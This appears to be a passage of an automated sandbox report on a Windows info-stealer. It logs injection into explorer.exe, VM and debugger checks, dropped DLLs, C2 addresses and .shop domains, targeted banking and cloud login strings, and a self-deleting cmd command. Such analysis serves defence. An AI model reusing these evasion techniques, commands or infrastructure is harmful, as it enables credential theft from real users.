                  Source: C:\Users\user\AppData\Roaming\aarhevh | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe | System information queried: FirmwareTableInformation
                  Source: aarhevh, 00000011.00000002.4461497269.000000000060B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOK
                  Source: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, 00000000.00000002.2051697711.00000000004E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOKPF{/"
                  Source: aarhevh, 00000004.00000002.2290240052.00000000005E0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ASWHOOKX~
                  Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe | Code function: 5_2_007C32E7 rdtsc 5_2_007C32E7
                  Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 402
                  Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2081
                  Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 819
                  Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 360
                  Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 2587
                  Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 873
                  Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 874
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\mozglue[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\freebl3.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\softokn3.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\ProgramData\GIEHIDHJDBFI\nss3.dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll
                  Source: C:\Windows\explorer.exe TID: 6472 | Thread sleep count: 402 > 30
                  Source: C:\Windows\explorer.exe TID: 7084 | Thread sleep count: 2081 > 30
                  Source: C:\Windows\explorer.exe TID: 7084 | Thread sleep time: -208100s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 1412 | Thread sleep count: 819 > 30
                  Source: C:\Windows\explorer.exe TID: 1412 | Thread sleep time: -81900s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 6972 | Thread sleep count: 257 > 30
                  Source: C:\Windows\explorer.exe TID: 7152 | Thread sleep count: 342 > 30
                  Source: C:\Windows\explorer.exe TID: 7152 | Thread sleep time: -34200s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 6596 | Thread sleep count: 360 > 30
                  Source: C:\Windows\explorer.exe TID: 6596 | Thread sleep time: -36000s >= -30000s
                  Source: C:\Windows\explorer.exe TID: 7084 | Thread sleep count: 2587 > 30
                  Source: C:\Windows\explorer.exe TID: 7084 | Thread sleep time: -258700s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exe TID: 2624 | Thread sleep time: -240000s >= -30000s
                  Source: C:\Windows\SysWOW64\timeout.exe TID: 3848 | Thread sleep count: 66 > 30
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\aarhevh | Last function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | Code function: 13_2_6C9FEBF0 PR_GetNumberOfProcessors,GetSystemInfo,13_2_6C9FEBF0
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmp | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW0r
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
                  Source: JEBKEH.13.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: JEBKEH.13.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
                  Source: JEBKEH.13.dr | Binary or memory string: global block list test formVMware20,11696428655
                  Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.000000000091E000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000997000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: JEBKEH.13.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: JEBKEH.13.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
                  Source: JEBKEH.13.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
                  Source: JEBKEH.13.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
                  Source: JEBKEH.13.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: JEBKEH.13.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: JEBKEH.13.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
                  Source: 21AE.exe, 00000005.00000003.2371692498.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
                  Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                  Source: JEBKEH.13.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
                  Source: JEBKEH.13.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
                  Source: katA304.tmp, 0000000D.00000002.3125202827.0000000000890000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware\Pr
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B41000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.2037994793.000000000769A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: JEBKEH.13.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2037994793.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
                  Source: JEBKEH.13.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.
                  Source: 21AE.exe, 00000005.00000002.2691719782.00000000007E9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWpn
                  Source: JEBKEH.13.dr | Binary or memory string: discord.comVMware20,11696428655f
                  Source: JEBKEH.13.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW+<
                  Source: JEBKEH.13.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: JEBKEH.13.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: JEBKEH.13.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: JEBKEH.13.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: JEBKEH.13.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: JEBKEH.13.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: JEBKEH.13.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: JEBKEH.13.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: JEBKEH.13.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                  Source: JEBKEH.13.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: JEBKEH.13.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: JEBKEH.13.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: JEBKEH.13.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                  Source: JEBKEH.13.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: explorer.exe, 00000002.00000000.2037244792.0000000003530000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware,p
                  Source: JEBKEH.13.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: explorer.exe, 00000002.00000000.2036595437.0000000000F13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSystem information queried: CodeIntegrityInformation
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_007C32E7 rdtsc 5_2_007C32E7
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeCode function: 0_2_00402A9F LdrLoadDll,0_2_00402A9F
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_6CACAC62
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_007BE06B push dword ptr fs:[00000030h]5_2_007BE06B
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_0214092B mov eax, dword ptr fs:[00000030h]5_2_0214092B
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeCode function: 5_2_02140D90 mov eax, dword ptr fs:[00000030h]5_2_02140D90

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\explorer.exeFile created: C9A7.exe.2.drJump to dropped file
                  Source: C:\Windows\explorer.exeNetwork Connect: 187.143.58.5 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 91.202.233.231 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.124 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 186.112.12.192 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 45.129.96.86 80Jump to behavior
                  Source: Yara matchFile source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory allocated: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeCode function: 12_2_042DA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,12_2_042DA4F0
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeThread created: C:\Windows\explorer.exe EIP: 33219E0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhThread created: unknown EIP: 31919E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000 value starts with: 4D5AJump to behavior
                  Source: 21AE.exeString found in binary or memory: zippyfinickysofwps.shop
                  Source: 21AE.exeString found in binary or memory: obsceneclassyjuwks.shop
                  Source: 21AE.exeString found in binary or memory: acceptabledcooeprs.shop
                  Source: 21AE.exeString found in binary or memory: whispedwoodmoodsksl.shop
                  Source: 21AE.exeString found in binary or memory: boredimperissvieos.shop
                  Source: 21AE.exeString found in binary or memory: holicisticscrarws.shop
                  Source: 21AE.exeString found in binary or memory: sweetsquarediaslw.shop
                  Source: 21AE.exeString found in binary or memory: plaintediousidowsko.shop
                  Source: 21AE.exeString found in binary or memory: miniaturefinerninewjs.shop
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\aarhevhSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeSection unmapped: C:\Users\user\AppData\Local\Temp\katA304.tmp base address: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 422000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 42E000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeMemory written: C:\Users\user\AppData\Local\Temp\katA304.tmp base: 641000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\C9A7.exeProcess created: C:\Users\user\AppData\Local\Temp\katA304.tmp C:\Users\user\AppData\Local\Temp\katA304.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katA304.tmp" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exitJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CB14760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,13_2_6CB14760
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6C9F1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,13_2_6C9F1C30
                  Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
                  Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000002.00000000.2037854889.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.2036938784.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000002.00000000.2036595437.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACAE71 cpuid 13_2_6CACAE71
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CACA8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,13_2_6CACA8DC
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpCode function: 13_2_6CA18390 NSS_GetVersion,13_2_6CA18390
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: 21AE.exe, 00000005.00000002.2691748524.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.000000000081F000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000978000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\21AE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\katA304.tmpWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 0000000C.00000002.2640862661.00000000042D9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 21AE.exe PID: 5640, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.2290056275.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.2290149216.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051360690.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2051493658.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 12.2.C9A7.exe.42a7719.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.2590000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.2590000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.44d0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.44d0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.C9A7.exe.42a7719.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: C9A7.exe PID: 3944, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: katA304.tmp PID: 1436, type: MEMORYSTR
                  Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
